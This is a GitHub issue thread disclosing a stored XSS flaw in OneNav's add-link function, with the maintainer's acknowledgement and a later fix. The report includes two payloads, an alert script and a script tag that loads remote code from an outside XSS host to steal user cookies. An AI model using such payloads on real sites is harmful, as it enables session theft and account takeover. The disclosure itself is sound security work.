Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

OneNav's add link function exists xss vul #26

Closed
alex123-2star opened this issue Aug 5, 2021 · 8 comments
Closed

OneNav's add link function exists xss vul #26

alex123-2star opened this issue Aug 5, 2021 · 8 comments
Labels
bug Something isn't working

Comments

@alex123-2star
Copy link

add link function path
image
input xss payload 1 :"><script>alert("XSS")</script>
image
click 添加 button
image
alert xss success
input xss payload 2:<sCRiPt sRC=//xss.pt/NZ9j></sCrIpT>
image
Get user cookie success

@alex123-2star
Copy link
Author

image

@helloxz
Copy link
Owner

helloxz commented Aug 5, 2021

您好,感谢您的反馈,目前后台确实没有做XSS过滤,一般正常的用户,不会通过后台权限自己给自己注入XSS代码,除非帐号、密码已经泄露。不过始终也算一个潜在风险,后续会增加XSS过滤和验证。

@helloxz helloxz added the enhancement New feature or request label Aug 5, 2021
@nu11secur1ty
Copy link

nu11secur1ty commented Aug 7, 2021

Yes, there has a big problem:
Proof: https://streamable.com/ubtzio, so, please fix add_link feature on your already created account, dear friend.
So. If you have some malicious user with admin rights or whatever, the game will be over. In another scenario, some malicious user will be sending an email with a malicious execution code, and again, the game is over. Fix:
You must sanitize these two environments, the user and the admin account platforms. No matter what happened, and must create special checks for add_link feature when the users using POST or GET parameters. More: You don't have any HTTP or HTTPS filter for inbound and outbound traffic, and this is a BIG problem =)
Love and Peace KR @nu11secur1ty

@OS-WS
Copy link

OS-WS commented Aug 8, 2021

Hi @helloxz ,
Are you planning to fix this issue?

@helloxz
Copy link
Owner

helloxz commented Aug 8, 2021

@nu11secur1ty @OS-WS @alex123-2star Hello everyone, this issue is expected to be fixed in the next version, thanks for your feedback.

@helloxz helloxz added bug Something isn't working and removed enhancement New feature or request labels Aug 8, 2021
@nu11secur1ty
Copy link

Ok tnx and BR

@helloxz
Copy link
Owner

helloxz commented Feb 16, 2022

0.9.13已修复这个漏洞,感谢支持。

@helloxz helloxz closed this as completed Feb 16, 2022
@nu11secur1ty
Copy link

<3

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

4 participants